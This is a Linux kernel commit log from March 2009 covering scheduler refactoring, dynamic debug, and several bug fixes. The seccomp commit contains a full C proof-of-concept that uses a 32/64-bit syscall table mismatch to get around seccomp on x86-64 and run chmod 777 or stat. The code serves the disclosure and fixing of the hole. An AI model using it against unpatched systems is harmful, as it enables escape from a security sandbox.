1. 25 3月, 2009 13 次提交
    • G
      sched: Add comments to find_busiest_group() function · b7bb4c9b
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Add /** style comments around find_busiest_group(). Also add a few
      explanatory comments.
      
      This concludes the find_busiest_group() cleanup. The function is
      now down to 72 lines from the original 313 lines.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091427.13992.18933.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      b7bb4c9b
    • G
      sched: Refactor the power savings balance code · c071df18
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Create seperate helper functions to initialize the
      power-savings-balance related variables, to update them and
      to check if we have a scope for performing power-savings balance.
      
      Add no-op inline functions for the !(CONFIG_SCHED_MC || CONFIG_SCHED_SMT)
      case.
      
      This will eliminate all the #ifdef jungle in find_busiest_group() and the
      other helper functions.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091422.13992.73616.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      c071df18
    • G
      sched: Optimize the !power_savings_balance during fbg() · a021dc03
      Gautham R Shenoy 提交于
      Impact: cleanup, micro-optimization
      
      We don't need to perform power_savings balance if either the
      cpu is NOT_IDLE or if the sched_domain doesn't contain the
      SD_POWERSAVINGS_BALANCE flag set.
      
      Currently, we check for these conditions multiple number of
      times, even though these variables don't change over the scope
      of find_busiest_group().
      
      Check once, and store the value in the already exiting
      "power_savings_balance" variable.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091417.13992.2657.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      a021dc03
    • G
      sched: Create a helper function to calculate imbalance · dbc523a3
      Gautham R Shenoy 提交于
      Move all the imbalance calculation out of find_busiest_group()
      through this helper function.
      
      With this change, the structure of find_busiest_group() will be
      as follows:
      
      - update_sched_domain_statistics.
      
      - check if imbalance exits.
      
      - update imbalance and return busiest.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091411.13992.43293.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      dbc523a3
    • G
      sched: Create helper to calculate small_imbalance in fbg() · 2e6f44ae
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      We have two places in find_busiest_group() where we need to calculate
      the minor imbalance before returning the busiest group. Encapsulate
      this functionality into a seperate helper function.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091406.13992.54316.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      2e6f44ae
    • G
      sched: Create a helper function to calculate sched_domain stats for fbg() · 37abe198
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Create a helper function named update_sd_lb_stats() to update the
      various sched_domain related statistics in find_busiest_group().
      
      With this we would have moved all the statistics computation out of
      find_busiest_group().
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091401.13992.88737.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      37abe198
    • G
      sched: Define structure to store the sched_domain statistics for fbg() · 222d656d
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Currently we use a lot of local variables in find_busiest_group()
      to capture the various statistics related to the sched_domain.
      Group them together into a single data structure.
      
      This will help us to offload the job of updating the sched_domain
      statistics to a helper function.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091356.13992.25970.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      222d656d
    • G
      sched: Create a helper function to calculate sched_group stats for fbg() · 1f8c553d
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Create a helper function named update_sg_lb_stats() which
      can be invoked to calculate the individual group's statistics
      in find_busiest_group().
      
      This reduces the lenght of find_busiest_group() considerably.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Aked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091351.13992.43461.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      1f8c553d
    • G
      sched: Define structure to store the sched_group statistics for fbg() · 381be78f
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Currently a whole bunch of variables are used to store the
      various statistics pertaining to the groups we iterate over
      in find_busiest_group().
      
      Group them together in a single data structure and add
      appropriate comments.
      
      This will be useful later on when we create helper functions
      to calculate the sched_group statistics.
      
      Credit: Vaidyanathan Srinivasan <svaidy@linux.vnet.ibm.com>
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      LKML-Reference: <20090325091345.13992.20099.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      381be78f
    • G
      sched: Fix indentations in find_busiest_group() using gotos · 6dfdb062
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Some indentations in find_busiest_group() can minimized by using
      early exits with the help of gotos. This improves readability in
      a couple of cases.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091340.13992.45062.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      6dfdb062
    • G
      sched: Simple helper functions for find_busiest_group() · 67bb6c03
      Gautham R Shenoy 提交于
      Impact: cleanup
      
      Currently the load idx calculation code is in find_busiest_group().
      Move that to a static inline helper function.
      
      Similary, to find the first cpu of a sched_group we use
      cpumask_first(sched_group_cpus(group))
      
      Use a helper to that. It improves readability in some cases.
      Signed-off-by: NGautham R Shenoy <ego@in.ibm.com>
      Acked-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Suresh Siddha <suresh.b.siddha@intel.com>
      Cc: "Balbir Singh" <balbir@in.ibm.com>
      Cc: Nick Piggin <nickpiggin@yahoo.com.au>
      Cc: "Dhaval Giani" <dhaval@linux.vnet.ibm.com>
      Cc: Bharata B Rao <bharata@linux.vnet.ibm.com>
      Cc: "Vaidyanathan Srinivasan" <svaidy@linux.vnet.ibm.com>
      LKML-Reference: <20090325091335.13992.55424.stgit@sofia.in.ibm.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      67bb6c03
    • J
      dynamic debug: combine dprintk and dynamic printk · e9d376f0
      Jason Baron 提交于
      This patch combines Greg Bank's dprintk() work with the existing dynamic
      printk patchset, we are now calling it 'dynamic debug'.
      
      The new feature of this patchset is a richer /debugfs control file interface,
      (an example output from my system is at the bottom), which allows fined grained
      control over the the debug output. The output can be controlled by function,
      file, module, format string, and line number.
      
      for example, enabled all debug messages in module 'nf_conntrack':
      
      echo -n 'module nf_conntrack +p' > /mnt/debugfs/dynamic_debug/control
      
      to disable them:
      
      echo -n 'module nf_conntrack -p' > /mnt/debugfs/dynamic_debug/control
      
      A further explanation can be found in the documentation patch.
      Signed-off-by: NGreg Banks <gnb@sgi.com>
      Signed-off-by: NJason Baron <jbaron@redhat.com>
      Signed-off-by: NGreg Kroah-Hartman <gregkh@suse.de>
      e9d376f0
    • L
      sched: remove unused fields from struct rq · 67aa0f76
      Luis Henriques 提交于
      Impact: cleanup, new schedstat ABI
      
      Since they are used on in statistics and are always set to zero, the
      following fields from struct rq have been removed: yld_exp_empty,
      yld_act_empty and yld_both_empty.
      
      Both Sched Debug and SCHEDSTAT_VERSION versions has also been
      incremented since ABIs have been changed.
      
      The schedtop tool has been updated to properly handle new version of
      schedstat:
      
         http://rt.wiki.kernel.org/index.php/Schedtop_utilitySigned-off-by: NLuis Henriques <henrix@sapo.pt>
      Acked-by: NGregory Haskins <ghaskins@novell.com>
      Acked-by: NPeter Zijlstra <peterz@infradead.org>
      LKML-Reference: <20090324221002.GA10061@hades.domain.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      67aa0f76
  2. 24 3月, 2009 2 次提交
    • O
      posix timers: fix RLIMIT_CPU && fork() · 37bebc70
      Oleg Nesterov 提交于
      See http://bugzilla.kernel.org/show_bug.cgi?id=12911
      
      copy_signal() copies signal->rlim, but RLIMIT_CPU is "lost". Because
      posix_cpu_timers_init_group() sets cputime_expires.prof_exp = 0 and thus
      fastpath_timer_check() returns false unless we have other cpu timers.
      
      This is the minimal fix for 2.6.29 (tested) and 2.6.28. The patch is not
      optimal, we need further cleanups here. With this patch update_rlimit_cpu()
      is not really needed, but I don't think it should be removed.
      
      The proper fix (I think) is:
      
      	- set_process_cpu_timer() should just start the cputimer->running
      	  logic (it does), no need to change cputime_expires.xxx_exp
      
      	- posix_cpu_timers_init_group() should set ->running when needed
      
      	- fastpath_timer_check() can check ->running instead of
      	  task_cputime_zero(signal->cputime_expires)
      Reported-by: NPeter Lojkin <ia6432@inbox.ru>
      Signed-off-by: NOleg Nesterov <oleg@redhat.com>
      Cc: Peter Zijlstra <peterz@infradead.org>
      Cc: Roland McGrath <roland@redhat.com>
      Cc: <stable@kernel.org> [for 2.6.29.x]
      LKML-Reference: <20090323193411.GA17514@redhat.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      37bebc70
    • M
      fix ptrace slowness · 53da1d94
      Miklos Szeredi 提交于
      This patch fixes bug #12208:
      
        Bug-Entry       : http://bugzilla.kernel.org/show_bug.cgi?id=12208
        Subject         : uml is very slow on 2.6.28 host
      
      This turned out to be not a scheduler regression, but an already
      existing problem in ptrace being triggered by subtle scheduler
      changes.
      
      The problem is this:
      
       - task A is ptracing task B
       - task B stops on a trace event
       - task A is woken up and preempts task B
       - task A calls ptrace on task B, which does ptrace_check_attach()
       - this calls wait_task_inactive(), which sees that task B is still on the runq
       - task A goes to sleep for a jiffy
       - ...
      
      Since UML does lots of the above sequences, those jiffies quickly add
      up to make it slow as hell.
      
      This patch solves this by not rescheduling in read_unlock() after
      ptrace_stop() has woken up the tracer.
      
      Thanks to Oleg Nesterov and Ingo Molnar for the feedback.
      Signed-off-by: NMiklos Szeredi <mszeredi@suse.cz>
      CC: stable@kernel.org
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      53da1d94
  3. 18 3月, 2009 2 次提交
  4. 17 3月, 2009 2 次提交
  5. 13 3月, 2009 3 次提交
  6. 12 3月, 2009 3 次提交
  7. 11 3月, 2009 2 次提交
  8. 10 3月, 2009 2 次提交
  9. 09 3月, 2009 1 次提交
    • H
      Fix fixpoint divide exception in acct_update_integrals · 6d5b5acc
      Heiko Carstens 提交于
      Frans Pop reported the crash below when running an s390 kernel under Hercules:
      
        Kernel BUG at 000738b4  verbose debug info unavailable!
        fixpoint divide exception: 0009  #1! SMP
        Modules linked in: nfs lockd nfs_acl sunrpc ctcm fsm tape_34xx
           cu3088 tape ccwgroup tape_class ext3 jbd mbcache dm_mirror dm_log dm_snapshot
           dm_mod dasd_eckd_mod dasd_mod
        CPU: 0 Not tainted 2.6.27.19 #13
        Process awk (pid: 2069, task: 0f9ed9b8, ksp: 0f4f7d18)
        Krnl PSW : 070c1000 800738b4 (acct_update_integrals+0x4c/0x118)
                   R:0 T:1 IO:1 EX:1 Key:0 M:1 W:0 P:0 AS:0 CC:1 PM:0
        Krnl GPRS: 00000000 000007d0 7fffffff fffff830
                   00000000 ffffffff 00000002 0f9ed9b8
                   00000000 00008ca0 00000000 0f9ed9b8
                   0f9edda4 8007386e 0f4f7ec8 0f4f7e98
        Krnl Code: 800738aa: a71807d0         lhi     %r1,2000
                   800738ae: 8c200001         srdl    %r2,1
                   800738b2: 1d21             dr      %r2,%r1
                  >800738b4: 5810d10e         l       %r1,270(%r13)
                   800738b8: 1823             lr      %r2,%r3
                   800738ba: 4130f060         la      %r3,96(%r15)
                   800738be: 0de1             basr    %r14,%r1
                   800738c0: 5800f060         l       %r0,96(%r15)
        Call Trace:
        ( <000000000004fdea>! blocking_notifier_call_chain+0x1e/0x2c)
          <0000000000038502>! do_exit+0x106/0x7c0
          <0000000000038c36>! do_group_exit+0x7a/0xb4
          <0000000000038c8e>! SyS_exit_group+0x1e/0x30
          <0000000000021c28>! sysc_do_restart+0x12/0x16
          <0000000077e7e924>! 0x77e7e924
      
      Reason for this is that cpu time accounting usually only happens from
      interrupt context, but acct_update_integrals gets also called from
      process context with interrupts enabled.
      
      So in acct_update_integrals we may end up with the following scenario:
      
      Between reading tsk->stime/tsk->utime and tsk->acct_timexpd an interrupt
      happens which updates accouting values.  This causes acct_timexpd to be
      greater than the former stime + utime.  The subsequent calculation of
      
      	dtime = cputime_sub(time, tsk->acct_timexpd);
      
      will be negative and the division performed by
      
      	cputime_to_jiffies(dtime)
      
      will generate an exception since the result won't fit into a 32 bit
      register.
      
      In order to fix this just always disable interrupts while accessing any
      of the accounting values.
      
      Reported by: Frans Pop <elendil@planet.nl>
      Tested by: Frans Pop <elendil@planet.nl>
      Cc: stable@kernel.org
      Cc: Martin Schwidefsky <schwidefsky@de.ibm.com>
      Signed-off-by: NHeiko Carstens <heiko.carstens@de.ibm.com>
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      6d5b5acc
  10. 06 3月, 2009 2 次提交
    • L
      sched: TIF_NEED_RESCHED -> need_reshed() cleanup · 5ed0cec0
      Lai Jiangshan 提交于
      Impact: cleanup
      
      Use test_tsk_need_resched(), set_tsk_need_resched(), need_resched()
      instead of using TIF_NEED_RESCHED.
      Signed-off-by: NLai Jiangshan <laijs@cn.fujitsu.com>
      Cc: Peter Zijlstra <a.p.zijlstra@chello.nl>
      LKML-Reference: <49B10BA4.9070209@cn.fujitsu.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      5ed0cec0
    • T
      percpu, module: implement reserved allocation and use it for module percpu variables · edcb4639
      Tejun Heo 提交于
      Impact: add reserved allocation functionality and use it for module
      	percpu variables
      
      This patch implements reserved allocation from the first chunk.  When
      setting up the first chunk, arch can ask to set aside certain number
      of bytes right after the core static area which is available only
      through a separate reserved allocator.  This will be used primarily
      for module static percpu variables on architectures with limited
      relocation range to ensure that the module perpcu symbols are inside
      the relocatable range.
      
      If reserved area is requested, the first chunk becomes reserved and
      isn't available for regular allocation.  If the first chunk also
      includes piggy-back dynamic allocation area, a separate chunk mapping
      the same region is created to serve dynamic allocation.  The first one
      is called static first chunk and the second dynamic first chunk.
      Although they share the page map, their different area map
      initializations guarantee they serve disjoint areas according to their
      purposes.
      
      If arch doesn't setup reserved area, reserved allocation is handled
      like any other allocation.
      Signed-off-by: NTejun Heo <tj@kernel.org>
      edcb4639
  11. 05 3月, 2009 2 次提交
    • F
      sched: don't rebalance if attached on NULL domain · 8a0be9ef
      Frederic Weisbecker 提交于
      Impact: fix function graph trace hang / drop pointless softirq on UP
      
      While debugging a function graph trace hang on an old PII, I saw
      that it consumed most of its time on the timer interrupt. And
      the domain rebalancing softirq was the most concerned.
      
      The timer interrupt calls trigger_load_balance() which will
      decide if it is worth to schedule a rebalancing softirq.
      
      In case of builtin UP kernel, no problem arises because there is
      no domain question.
      
      In case of builtin SMP kernel running on an SMP box, still no
      problem, the softirq will be raised each time we reach the
      next_balance time.
      
      In case of builtin SMP kernel running on a UP box (most distros
      provide default SMP kernels, whatever the box you have), then
      the CPU is attached to the NULL sched domain. So a kind of
      unexpected behaviour happen:
      
      trigger_load_balance() -> raises the rebalancing softirq later
      on softirq: run_rebalance_domains() -> rebalance_domains() where
      the for_each_domain(cpu, sd) is not taken because of the NULL
      domain we are attached at. Which means rq->next_balance is never
      updated. So on the next timer tick, we will enter
      trigger_load_balance() which will always reschedule() the
      rebalacing softirq:
      
      if (time_after_eq(jiffies, rq->next_balance))
      	raise_softirq(SCHED_SOFTIRQ);
      
      So for each tick, we process this pointless softirq.
      
      This patch fixes it by checking if we are attached to the null
      domain before raising the softirq, another possible fix would be
      to set the maximal possible JIFFIES value to rq->next_balance if
      we are attached to the NULL domain.
      
      v2: build fix on UP
      Signed-off-by: NFrederic Weisbecker <fweisbec@gmail.com>
      Cc: Steven Rostedt <rostedt@goodmis.org>
      Cc: Peter Zijlstra <peterz@infradead.org>
      LKML-Reference: <49af242d.1c07d00a.32d5.ffffc019@mx.google.com>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      8a0be9ef
    • E
      rcu: increment quiescent state counter in ksoftirqd() · 64ca5ab9
      Eric Dumazet 提交于
      If a machine is flooded by network frames, a cpu can loop
      100% of its time inside ksoftirqd() without calling schedule().
      This can delay RCU grace period to insane values.
      
      Adding rcu_qsctr_inc() call in ksoftirqd() solves this problem.
      
      Paul: "This regression was a result of the recent change from
      "schedule()" to "cond_resched()", which got rid of that quiescent
      state in the common case where a reschedule is not needed".
      Signed-off-by: NEric Dumazet <dada1@cosmosbay.com>
      Reviewed-by: NPaul E. McKenney <paulmck@linux.vnet.ibm.com>
      Signed-off-by: NAndrew Morton <akpm@linux-foundation.org>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      64ca5ab9
  12. 03 3月, 2009 2 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
    • P
      genirq: assert that irq handlers are indeed running in hardirq context · 044d4084
      Peter Zijlstra 提交于
      Make sure the genirq layer handlers are indeed running handlers
      in hardirq context. That is the genirq expectation and doing
      anything else is broken.
      Signed-off-by: NPeter Zijlstra <a.p.zijlstra@chello.nl>
      Cc: Andrew Morton <akpm@linux-foundation.org>
      LKML-Reference: <1236006812.5330.632.camel@laptop>
      Signed-off-by: NIngo Molnar <mingo@elte.hu>
      044d4084
  13. 02 3月, 2009 1 次提交
  14. 28 2月, 2009 1 次提交
  15. 27 2月, 2009 2 次提交